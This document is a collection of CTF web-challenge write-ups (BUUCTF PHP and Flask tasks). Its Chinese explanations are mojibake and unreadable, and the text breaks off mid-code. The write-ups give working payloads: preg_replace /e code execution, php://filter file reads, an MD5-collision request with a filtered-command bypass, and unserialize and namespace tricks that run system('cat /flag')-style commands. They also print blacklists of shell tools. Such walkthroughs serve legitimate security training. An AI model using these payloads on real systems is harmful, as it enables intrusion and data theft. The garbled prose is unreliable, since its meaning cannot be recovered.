https://mayi077.gitee.io/2020/02/29/GWCTF-2019-ÎÒÓÐÒ»¸öÊý¾Ý¿â/
https://blog.csdn.net/rfrder/article/details/109684292
https://blog.csdn.net/hclimg/article/details/102783871
https://da4er.top/´úÂëÉó¼Æ-phpmyadmin4-8-1ºǫ́Îļþ°üº¬Â©¶´-CVE-2018-12613.html
[BJDCTF2020]Mark loves cat
ÓÃdirsearch ɨÃèÍøÕ¾,·¢ÏÖ.git й¶,ÓÃgithack ÏÂÔØ,ÕâÀï¿ÉÄÜÏÂÔز»³É¹¦,¹Ò´úÀíºÍ²»¹Ò´úÀí¶¼ÊÔÒ»ÏÂ,·¢ÏÖÔ´Âë:
<?php
include 'flag.php';
$yds = "dog";
$is = "cat";
$handsome = 'yds';
foreach($_POST as $x => $y){
$$x = $y;
}
foreach($_GET as $x => $y){
$$x = $$y;
}
foreach($_GET as $x => $y){
if($_GET['flag'] === $x && $x !== 'flag'){
exit($handsome);
}
}
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
exit($yds);
}
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
exit($is);
}
echo "the flag is: ".$flag;
ÊäÈëurl:
/?yds=flag
µÃµ½flag,ÎÒÃÇ·¢Ë͵ÄÊÇGET ÇëÇó,ÍêÕûµÄÁ´½ÓÊÇ:
http://a1264355-5edf-4c7c-a6fc-e8f62b8e1b22.node3.buuoj.cn/?yds=flag
½øÈë´úÂëºó:
foreach($_POST as $x => $y){
$$x = $y;
}
ûÓÐÖ´ÐÐ,ÒòΪÎÒÃÇûÓз¢ËÍpostÇëÇó,È»ºóµ½µÚ¶þ¶Î´úÂë:
foreach($_GET as $x => $y){
$$x = $$y;
}
ÌáÈ¡¼üÖµ¶Ô,½«yds ¸³Öµ¸ø$x ,flag ¸³Öµ¸ø$y ,ËùÒÔ$$x=$yds ,$$y=$flag ,×îºóÖ´ÐÐÍêºó±äΪ$yds=$flag ,½ô½Ó×Å:
foreach($_GET as $x => $y){
if($_GET['flag'] === $x && $x !== 'flag'){
exit($handsome);
}
}
ûÓб»Ö´ÐÐ,ÒòΪif Åжϲ»³ÉÁ¢,È»ºóÖ´ÐÐ:
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
exit($yds);
}
·¢ÏÖÂú×ãÌõ¼þ,Êä³ö$yds ,Ò²¾ÍÊÇ$flag ¡£×îºóµÃµ½flag,²éѯphpÊÖ²á:
exit (PHP 4, PHP 5, PHP 7, PHP 8) exit ¡ª Êä³öÒ»¸öÏûÏ¢²¢ÇÒÍ˳öµ±Ç°½Å±¾
exit¿ÉÒÔÊä³öÄÚÈÝ¡£
References
https://www.codenong.com/cs105925473/
https://blog.csdn.net/jianpanliu/article/details/107028582
[BJDCTF2020]ZJCTF,²»¹ýÈç´Ë
DATA URI Scheme
data:¢Ù[]¢Ú[;charset=]¢Û[;]¢Ü,¢Ý
¢Ù data : ÐÒéÃû³Æ
¢Ú [<mime type>] ¿ÉÑ¡Ïî,Êý¾ÝÀàÐÍ(image/png ¡¢text/plain µÈ)
¢Û [;charset=<charset>] ¿ÉÑ¡Ïî,Ô´Îı¾µÄ×Ö·û¼¯±àÂ뷽ʽ
¢Ü [;<encoding>] Êý¾Ý±àÂ뷽ʽ(ĬÈÏUS-ASCII ,BASE64 Á½ÖÖ)
¢Ý ,<encoded data> ±àÂëºóµÄÊý¾Ý
×¢Òâ:
[<mime type>][;charset=<charset>] µÄȱʡֵΪHTTP Header ÖÐContent-Type µÄ×Ö¶ÎÖµ[;<encoding>] µÄĬÈÏֵΪUS-ASCII ,¾ÍÊÇÿ¸ö×Ö·û»á±àÂëΪ%xx µÄÐÎʽ[;charset=<charset>] ¶ÔÓÚIEÊÇÎÞЧµÄ,ÐèҪͨ¹ý charset ÉèÖñàÂ뷽ʽ;¶øChrome ÔòÊÇ charset ÊôÐÔÉèÖñàÂëÎÞЧ,Ҫͨ¹ý [;charset=<charset>] À´ÉèÖÃ;FF ¾ÍÁ½ÖÖ·½Ê½¾ù¿É- Èô
,<encoded data> ²»ÊÇÒÔ [;<encoding>] ·½Ê½±àÂëºóµÄÊý¾Ý,Ôò»á±¨Òì³£
References
https://www.cnblogs.com/fsjohnhuang/p/3903688.html
´ò¿ªÍøÒ³ÏÔʾԴÂë:
<?php
error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
if(preg_match("/flag/",$file)){
die("Not now!");
}
include($file);
}
else{
highlight_file(__FILE__);
}
?>
get ´«ÈëÁ½¸ö²ÎÊýtext ºÍfile ,text ²ÎÊýÀûÓÃfile_get_contents() º¯ÊýÖ»¶ÁÐÎʽ´ò¿ª,´ò¿ªºóÄÚÈÝÒªÓë"I have a dream" ×Ö·û´®ÏàÆ¥Åä,²ÅÄÜÖ´ÐÐÏÂÃæµÄÎļþ°üº¬$file ²ÎÊý¡£¿´µ½ÓõÄÊÇfile_get_contents() º¯Êý´ò¿ªtext ²ÎÊý,ÒÔ¼°ºóÃæµÄÎļþ°üº¬º¯Êý,×ÔÈ»µÄÏëµ½phpαÐÒéÖеÄdata:// ÐÒé
References
https://blog.csdn.net/weixin_44622228/article/details/105644054
data ÐÒéͨ³£ÊÇÓÃÀ´Ö´ÐÐPHP´úÂë,È»¶øÎÒÃÇÒ²¿ÉÒÔ½«ÄÚÈÝдÈëdata ÐÒéÖÐÈ»ºóÈÃfile_get_contents º¯ÊýÈ¡¶ÁÈ¡¡£µ±È»Ò²¿ÉÒÔ²»ÐèÒªbase64 ,µ«ÊÇÒ»°ãΪÁËÈƹýijЩ¹ýÂ˶¼»áÓõ½base64 ,ÊäÈë:
/?text=data://text/plain,I have a dream
»òÕß
/?text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=
ÍøÒ³Ìáʾ:
I have a dream
php://filter ÓÃÓÚ¶ÁÈ¡Ô´Âë,php://input ÓÃÓÚÖ´ÐÐphp´úÂë,ÒòΪÊÇphpÎļþ,ÎÒÃÇÏë¿´µ½ÄÚÈݾÍÐèÒªphp://filter αÐÒé,³¢ÊÔÒÔbase64 ±àÂë¶ÁÈ¡next.php ÄÚÈÝ¡£
ÊäÈëurl:
/?text=data://text/plain,I have a dream&file=php://filter/read=convert.base64-encode/resource=next.php
ÍøÒ³base64½âÂë:
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) {
return preg_replace(
'/(' . $re . ')/ei',
'strtolower("\\1")',
$str
);
}
foreach($_GET as $re => $str) {
echo complex($re, $str). "\n";
}
function getFlag(){
@eval($_GET['cmd']);
}
´ð°¸ÊÇÊäÈëurl:
/next.php?\S*=${getFlag()}&cmd=system('cat /flag');
µÃµ½flag¡£
ÏÂÃæÊÇϸ½Ú½âÎö,´úÂë´Ó:
foreach($_GET as $re => $str) {
echo complex($re, $str). "\n";
}
¿ªÊ¼Ö´ÐÐ,´«ÈëµÄ\S* ? ${getFlag()} ³ÉΪ$re=\S*, $str=${getFlag()} ¡£È»ºóµ÷ÓÃcomplex() º¯Êý:
function complex($re, $str) {
return preg_replace(
'/(' . $re . ')/ei',
'strtolower("\\1")',
$str
);
}
´«Èë²ÎÊýºó,preg_replace('/(' . $re . ')/ei', 'strtolower("\\1")', $str); µÈ¼ÛÓÚpreg_replace('/(\S*)/ei', 'strtolower("\\1")', '${getFlag()}');
²éѯphpÊÖ²ástrtolower() º¯Êý:
strtolower (PHP 4, PHP 5, PHP 7, PHP 8) strtolower ¡ª ½«×Ö·û´®×ª»¯ÎªÐ¡Ð´
²éѯphpÊÖ²ápreg_replace() º¯Êý:
preg_replace (PHP 4, PHP 5, PHP 7, PHP 8) preg_replace ¡ª Ö´ÐÐÒ»¸öÕýÔò±í´ïʽµÄËÑË÷ºÍÌæ»» ˵Ã÷ preg_replace( mixed $pattern, mixed $replacement, mixed $subject) : mixed ËÑË÷ subject ÖÐÆ¥Åä pattern µÄ²¿·Ö,ÒÔ replacement ½øÐÐÌæ»»¡£ ²ÎÊý pattern ÒªËÑË÷µÄģʽ¡£¿ÉÒÔʹһ¸ö×Ö·û´®»ò×Ö·û´®Êý×é¡£ ¿ÉÒÔʹÓÃPCRE ÐÞÊηû¡£ÕýÔò±í´ïʽÓï¾ä¡£ replacement ÓÃÓÚÌæ»»µÄ×Ö·û´®»ò×Ö·û´®Êý×é¡£ ÏêÇé¼û https://www.runoob.com/php/php-preg_replace.html subject Òª½øÐÐËÑË÷ºÍÌæ»»µÄ×Ö·û´®»ò×Ö·û´®Êý×é¡£
preg_replace('/(\S*)/ei', 'strtolower("\\1")', '${getFlag()}'); Õâ¾ä»°Ö´Ðйý³ÌΪÏÈÓÃÕýÔò±í´ïʽ/(\S*)/ei ȥƥÅä${getFlag()} ¡£Ò²¿ÉÒÔÓÃ.* À´Æ¥Åä${getFlag()} Õû¸ö×Ö·û´®,µ«php×ÔÉíÔÚ½âÎöÇëÇóµÄʱºò,Èç¹û²ÎÊýÃû×ÖÖаüº¬¿Õ¸ñ ¡¢. ¡¢[ µÈ×Ö·û,»á½«ËûÃÇת»»³É_ ¡£ËùÒÔ²»ÄÜÓÃ.* À´Æ¥ÅäÈÎÒâ×Ö·û,ÐèÒªÓÃ\S* ´úÌæ,\s ÔÚÕýÔò±í´ïʽÖÐÆ¥Åä¿Õ¸ñ ¡¢ÖƱí·û ºÍ»»Ðзû µÈ¿Õ°××Ö·û,\S Æ¥Åä³ý¿Õ¸ñ ¡¢ÖƱí·û ºÍ»»Ðзû ÒÔÍâµÄ×Ö·û¡£
References
http://www.lmxspace.com/2018/08/12/Ò»¸öÓÐȤµÄpreg-replaceº¯Êý/
ÓÃ/(\S*)/ei ȥƥÅä${getFlag()} ,Ö»ÓÐÒ»¸öÆ¥Åä½á¹û,Æ¥Åä½á¹û´æ´¢µ½Ò»¸öÁÙʱ»º³åÇøÖÐ,Ëù²¶»ñµÄÿ¸ö×ÓÆ¥Å䶼°´ÕÕÔÚÕýÔò±í´ïʽģʽÖдÓ×óµ½ÓÒ³öÏÖµÄ˳Ðò´æ´¢¡£»º³åÇø±àºÅ´Ó1 ¿ªÊ¼,×î¶à¿É´æ´¢99 ¸ö²¶»ñµÄ×Ó±í´ïʽ¡£Ã¿¸ö»º³åÇø¶¼¿ÉÒÔʹÓÃ'\n' ·ÃÎÊ,ÆäÖÐn Ϊһ¸ö±êʶÌض¨»º³åÇøµÄһλ»òÁ½Î»Ê®½øÖÆÊý¡£Õâ´ÎÆ¥ÅäÖ»ÓÐÒ»¸öÆ¥Åä½á¹û,ËùÒÔ»º³åÇø±àºÅÖ»ÓÐ1 ¡£\\1 ÖеÚÒ»¸ö\ ÊÇתÒå×Ö·û,±íʾµÚ¶þ¸ö\ ÊÇÕæÕýµÄ\ ,²»ÊÇÌØÊâ×Ö·û,ËùÒÔ\\1 ¾ÍÊÇ\1 ,\1 ¾ÍÊÇ·ÃÎʵÚÒ»¸ö»º³åÇø¡£ËùÒÔstrtolower("\\1") ±äΪstrtolower("${getFlag()}") ¡£
References
ºóÏòÒýÓÃ https://wiki.jikexueyuan.com/project/regex/back-reference.html
preg_replace µÄ/e ÐÞÕý·û»á½«replacement ²ÎÊý,¼´preg_replace µÚ¶þ¸ö²ÎÊý,µ±×÷php ´úÂë,²¢ÇÒÒÔ eval º¯ÊýµÄ·½Ê½Ö´ÐÐ,Ç°ÌáÊÇ subject ÖÐÓÐpattern µÄÆ¥Åä¡£ËùÒÔpreg_replace('/(\S*)/ei', 'strtolower("\\1")', '${getFlag()}'); Õâ¾ä»°×îºóÒ»²½¾ÍÊÇÖ´ÐÐstrtolower("${getFlag()}") ¡£
ÔÚPHPÖÐË«ÒýºÅ°ü¹üµÄ×Ö·û´®ÖпÉÒÔ½âÎöΪ±äÁ¿,¶øµ¥ÒýºÅÔò²»ÐС£ Èç¹ûÊÇ"getFlag()" ,Õû¸öÖ»ÊÇÒ»¸ö×Ö·û´®,¶ø"${getFlag()}" ²»Ò»Ñù¡£
References
¿É±ä±äÁ¿ https://www.php.net/manual/zh/language.variables.variable.php
${getFlag()} ÖеÄgetFlag() »á±»µ±×ö±äÁ¿ÏÈÖ´ÐÐ,Ìøתµ½getFlag() º¯ÊýÌáÈ¡GET ÇëÇóÖÐcmd µÄÖµsystem('cat /flag') ,eval º¯Êý»á°Ñ'system('cat /flag')' ×Ö·û´®µ±×÷ÃüÁîÖ´ÐÐ,×îºóÊä³öflag¡£²éѯphpÊÖ²á:
eval (PHP 4, PHP 5, PHP 7, PHP 8) eval ¡ª °Ñ×Ö·û´®×÷ΪPHP´úÂëÖ´ÐР˵Ã÷ eval( string $code) : mixed °Ñ×Ö·û´® code ×÷ΪPHP´úÂëÖ´ÐС£
References
http://www.lmxspace.com/2018/08/12/Ò»¸öÓÐȤµÄpreg-replaceº¯Êý/
https://www.runoob.com/php/php-preg_replace.html
https://regex101.com/
https://xz.aliyun.com/t/2557
[°²ä± 2019]easy_web
½øÈëÍøÒ³,µÃµ½Ò»ÕÅͼƬ,½áºÏurl,²ÂÏëͼƬÃû×Ö¾¹ý¼ÓÃܺó·¢ÆðGET ÇëÇó¡£
¶Ôimg ²ÎÊýÖµ½øÐнâÃÜ,½âÃÜ˳Ðò:base64->base64->hex
555.png
References
CyberChef
ËùÒÔÎÒÃÇÒªµÃµ½index.php µÄÔ´Âë,ÎÒÃÇ¿ÉÒÔ·´¹ýÀ´¼ÓÃÜ:
hex->base64->base64 ,½á¹ûΪ:
TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
References
CyberChef
×¢Òâ¼ÓÃܲÎÊýÑϸñ°´ÕÕÈçÉÏÁ´½Ó¼ÓÃÜ,·ñÔòÓëÍøÒ³¼ÓÃÜ·½Ê½²»Æ¥Åä,µ¼ÖÂÕÒ²»µ½Îļþ¡£
ÊäÈëurl:
/index.php?img=TmprMlpUWTBOalUzT0RKbE56QTJPRGN3&cmd=
µÃµ½base64 ¼ÓÃܱàÂë,½âÃܺóΪ:
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
echo '<img src ="./ctf3.jpeg">';
die("xixi~ no flag");
} else {
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64," . $txt . "'></img>";
echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "<br>";
} else {
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
}
?>
<html>
<style>
body{
background:url(./bj.png) no-repeat center center;
background-size:cover;
background-attachment:fixed;
background-color:
}
</style>
<body>
</body>
</html>
todo»¹Ã»ÓзÖÎöÔ´Âë,ÒªÈÏÕæ¿´¡£
¹¹ÔìPOST ÇëÇó:
POST /index.php?cmd=dir%20/ HTTP/1.1
Host: e55e28a0-6ce5-44fc-9386-7275b7e65cba.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
Content-Length: 389
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
POST Êý¾Ýa ºÍb Ó¦¸ÃÊÇ×îºóÒ»ÐÐ,ºóÃæ²»ÄÜÓл»Ðлò¿ÕÐÐ,·ñÔòPOST ²»³É¹¦¡£
ÏìÓ¦:
bin dev flag lib media opt root sbin sys usr
boot etc home lib64 mnt proc run srv tmp var
·¢ÏÖflag,¹¹ÔìÇëÇó:
POST /index.php?cmd=ca\t%20/flag HTTP/1.1
Host: e55e28a0-6ce5-44fc-9386-7275b7e65cba.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
Content-Length: 389
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
µÃµ½flag,»òÕß:
POST /index.php?cmd=strings%20/flag HTTP/1.1
Host: e55e28a0-6ce5-44fc-9386-7275b7e65cba.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
Content-Length: 389
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
»òÕß:
POST /index.php?cmd=sort%20/flag HTTP/1.1
Host: e55e28a0-6ce5-44fc-9386-7275b7e65cba.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
Content-Length: 389
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
sort½«ÎļþµÄÿһÐÐ×÷Ϊһ¸öµ¥Î»,Ï໥±È½Ï,±È½ÏÔÔòÊÇ´ÓÊ××Ö·ûÏòºó,ÒÀ´Î°´ASCIIÂëÖµ½øÐбȽÏ,×îºó½«ËûÃÇ°´ÉýÐòÊä³ö¡£
todoΪʲô¼Ó%,²»¼Ó%Ϊʲô²»ÐС£
References
Ç¿Åöײ https://www.jianshu.com/p/c9089fd5b1ba
https://my.oschina.net/hetianlab/blog/4949531
https://xz.aliyun.com/t/6911
https://www.jianshu.com/p/f3fe31aeadf4
https://www.jianshu.com/p/21e3e1f74c08
https://www.cnblogs.com/wangtanzhi/p/12244096.html
https://www.wh1teze.top/articles/2020/02/04/1580806596938.html
[Íø¶¦± 2020 Öìȸ×é]phpweb
´ò¿ªÍøÒ³·¢ÏÖÌáʾ:
Warning: date(): It is not safe to rely on the system¡¯s timezone settings. You are required to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected the timezone ¡®UTC¡¯ for now, but please set date.timezone to select your timezone. in /var/www/html/index.php on line 24 2021-04-05 08:41:58 am
¹¹ÔìÇëÇó,¶ÁÈ¡index.php Ô´Âë:
POST /index.php HTTP/1.1
Host: e17ade30-58a8-469f-a158-4a16c6c2fa7f.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
func=file_get_contents&p=index.php
file_get_contents »»³Éhighlight_file Ò²¿ÉÒÔ¡£²»ÄÜÓÃshow_source ¡£
·¢ÏÖÔ´Âë:
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
$result = call_user_func($func, $p);
$a= gettype($result);
if ($a == "string") {
return $result;
} else {return "";}
}
class Test {
var $p = "Y-m-d h:i:s a";
var $func = "date";
function __destruct() {
if ($this->func != "") {
echo gettime($this->func, $this->p);
}
}
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
$func = strtolower($func);
if (!in_array($func,$disable_fun)) {
echo gettime($func, $p);
}else {
die("Hacker...");
}
}
?>
²éѯphpÊÖ²áfile_get_contents º¯Êý:
file_get_contents (PHP 4 >= 4.3.0, PHP 5, PHP 7, PHP 8) file_get_contents ¡ª ½«Õû¸öÎļþ¶ÁÈëÒ»¸ö×Ö·û´® ˵Ã÷ file_get_contents( string $filename, bool $use_include_path = false, resource $context = ?, int $offset = -1, int $maxlen = ?) : string ºÍ file() Ò»Ñù,Ö»³ýÁË file_get_contents() °ÑÎļþ¶ÁÈëÒ»¸ö×Ö·û´®¡£½«ÔÚ²ÎÊý offset ËùÖ¸¶¨µÄλÖÿªÊ¼¶ÁÈ¡³¤¶ÈΪ maxlen µÄÄÚÈÝ¡£Èç¹ûʧ°Ü,file_get_contents() ½«·µ»Ø false¡£ file_get_contents() º¯ÊýÊÇÓÃÀ´½«ÎļþµÄÄÚÈݶÁÈëµ½Ò»¸ö×Ö·û´®ÖеÄÊ×Ñ¡·½·¨¡£Èç¹û²Ù×÷ϵͳ֧³Ö»¹»áʹÓÃÄÚ´æÓ³Éä¼¼ÊõÀ´ÔöÇ¿ÐÔÄÜ¡£ Note: Èç¹ûÒª´ò¿ªÓÐÌØÊâ×Ö·ûµÄ URL (±ÈÈç˵Óпոñ),¾ÍÐèҪʹÓà urlencode() ½øÐÐ URL ±àÂë¡£
²éѯphpÊÖ²ácall_user_func º¯Êý:
call_user_func (PHP 4, PHP 5, PHP 7, PHP 8) call_user_func ¡ª °ÑµÚÒ»¸ö²ÎÊý×÷Ϊ»Øµ÷º¯Êýµ÷Óà ˵Ã÷ call_user_func( callable $callback, mixed $parameter = ?, mixed $¡ = ?) : mixed µÚÒ»¸ö²ÎÊý callback ÊDZ»µ÷ÓõĻص÷º¯Êý,ÆäÓà²ÎÊýÊǻص÷º¯ÊýµÄ²ÎÊý¡£
call_user_func() µÄÀý×Ó
<?php
function barber($type)
{
echo "You wanted a $type haircut, no problem\n";
}
call_user_func('barber', "mushroom");
call_user_func('barber', "shave");
?>
ÒÔÉÏÀý³Ì»áÊä³ö:
You wanted a mushroom haircut, no problem
You wanted a shave haircut, no problem
Test ÀàÓÐ__destruct ħÊõ·½·¨,ÒòΪunserialize ²»ÔÚºÚÃûµ¥ÀïÃæ,ËùÒÔÏëµ½·´ÐòÁл¯Â©¶´,¹¹ÔìÒ»¸ö·´ÐòÁл¯×Ö·û´®,°üº¬ÎÒÃÇÐèÒªÖ´ÐеIJÎÊýºÍº¯Êý,Ìá½»ÇëÇóºó»á×Ô¶¯°´ÕÕÎÒÃǵÄÉ趨µÄº¯Êý½øÐз´ÐòÁл¯,°Ñ×Ö·û´®»¹Ô³ÉTest Àà,µ±ÔÚ³ÌÐò½áÊøʱ,µ÷ÓÃ__destruct ħÊõ·½·¨,µ÷ÓÃÁËgettime º¯Êý,ÒòΪ¿ØÖÆÁËÀàµÄ²ÎÊý,¼´¿ÉʵÏÖÈÎÒâ´úÂëÖ´ÐС£
ÔÚÀûÓöÔPHP·´ÐòÁл¯½øÐÐÀûÓÃʱ,¾³£ÐèҪͨ¹ý·´ÐòÁл¯ÖеÄħÊõ·½·¨,¼ì²é·½·¨ÀïÓÐÎÞÃô¸Ð²Ù×÷À´½øÐÐÀûÓÃ,³£¼û·½·¨:
__construct() //´´½¨¶ÔÏóʱ´¥·¢ __destruct() //¶ÔÏó±»Ïú»Ùʱ´¥·¢ __call() //ÔÚ¶ÔÏóÉÏÏÂÎÄÖе÷Óò»¿É·ÃÎʵķ½·¨Ê±´¥·¢ __callStatic() //ÔÚ¾²Ì¬ÉÏÏÂÎÄÖе÷Óò»¿É·ÃÎʵķ½·¨Ê±´¥·¢ __get() //ÓÃÓÚ´Ó²»¿É·ÃÎʵÄÊôÐÔ¶ÁÈ¡Êý¾Ý __set() //ÓÃÓÚ½«Êý¾ÝдÈë²»¿É·ÃÎʵÄÊôÐÔ __isset() //ÔÚ²»¿É·ÃÎʵÄÊôÐÔÉϵ÷ÓÃisset()»òempty()´¥·¢ __unset() //ÔÚ²»¿É·ÃÎʵÄÊôÐÔÉÏʹÓÃunset()ʱ´¥·¢ __invoke() //µ±½Å±¾³¢ÊÔ½«¶ÔÏóµ÷ÓÃΪº¯Êýʱ´¥·¢
phpÐòÁл¯´úÂë:
<?php
class Test {
var $p = "cat $(find / -name flag*)";
var $func = "system";
}
$a = new Test();
echo serialize($a);
?>
phpÖÐÀàÊôÐÔ±ØÐ붨ÒåΪ¹«ÓÐ,Êܱ£»¤,˽ÓÐÖ®Ò»¡£ËùÒÔÈç¹ûûÓÐÄÇÈý¸öÐÞÊηû,±ØÐëÓÃvar , var ÊÇpublic µÄ±ðÃû,Êä³ö:
O:4:"Test":2:{s:1:"p";s:25:"cat $(find / -name flag*)";s:4:"func";s:6:"system";}
¹¹ÔìÇëÇó:
POST /index.php HTTP/1.1
Host: e17ade30-58a8-469f-a158-4a16c6c2fa7f.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:25:"cat $(find / -name flag*)";s:4:"func";s:6:"system";}
µÃµ½flag¡£
ÃüÃû¿Õ¼äÕâ¸ö¸ÅÄîÔÚPHP5.3 ¾ÍÒýÈëÁË,µ«Ò»Ö±Ö»Ö§³ÖÀàÃûµÄÃüÃû¿Õ¼ä,Ö±µ½PHP5.6 ²Å¼ÓÈëÁ˺¯ÊýÃûµÄÃüÃû¿Õ¼ä¡£·´Ð±¸Ü¼ÓÀà¡¢º¯ÊýºÍ³£Á¿±íʾÔÚÃüÃû¿Õ¼äÄÚ²¿·ÃÎÊÈ«¾ÖÀà¡¢º¯ÊýºÍ³£Á¿,Àý×Ó:
<?php
namespace Foo;
function strlen() {}
const INI_ALL = 3;
class Exception {}
$a = \strlen('hi');
$b = \INI_ALL;
$c = new \Exception('error');
?>
References
https://www.runoob.com/php/php-namespace.html
¹¹ÔìÇëÇó:
POST / HTTP/1.1
Host: e17ade30-58a8-469f-a158-4a16c6c2fa7f.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
func=\system&p=cat $(find / -name flag*)
µÃµ½flag¡£
References
https://www.anquanke.com/post/id/205679
[De1CTF 2019]SSRF Me
´ò¿ªÍøÒ³,ÏÔʾԴÂë:
from flask import Flask
from flask import request
import socket
import hashlib
import urllib
import sys
import os
import json
reload(sys)
sys.setdefaultencoding('latin1')
app = Flask(__name__)
secert_key = os.urandom(16)
class Task:
def __init__(self, action, param, sign, ip):
self.action = action
self.param = param
self.sign = sign
self.sandbox = md5(ip)
if(not os.path.exists(self.sandbox)):
os.mkdir(self.sandbox)
def Exec(self):
result = {}
result['code'] = 500
if (self.checkSign()):
if "scan" in self.action:
tmpfile = open("./%s/result.txt" % self.sandbox, 'w')
resp = scan(self.param)
if (resp == "Connection Timeout"):
result['data'] = resp
else:
print(resp)
tmpfile.write(resp)
tmpfile.close()
result['code'] = 200
if "read" in self.action:
f = open("./%s/result.txt" % self.sandbox, 'r')
result['code'] = 200
result['data'] = f.read()
if result['code'] == 500:
result['data'] = "Action Error"
else:
result['code'] = 500
result['msg'] = "Sign Error"
return result
def checkSign(self):
if (getSign(self.action, self.param) == self.sign):
return True
else:
return False
@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
param = urllib.unquote(request.args.get("param", ""))
action = "scan"
return getSign(action, param)
@app.route('/De1ta',methods=['GET','POST'])
def challenge():
action = urllib.unquote(request.cookies.get("action"))
param = urllib.unquote(request.args.get("param", ""))
sign = urllib.unquote(request.cookies.get("sign"))
ip = request.remote_addr
if(waf(param)):
return "No Hacker!!!!"
task = Task(action, param, sign, ip)
return json.dumps(task.Exec())
@app.route('/')
def index():
return open("code.txt","r").read()
def scan(param):
socket.setdefaulttimeout(1)
try:
return urllib.urlopen(param).read()[:50]
except:
return "Connection Timeout"
def getSign(action, param):
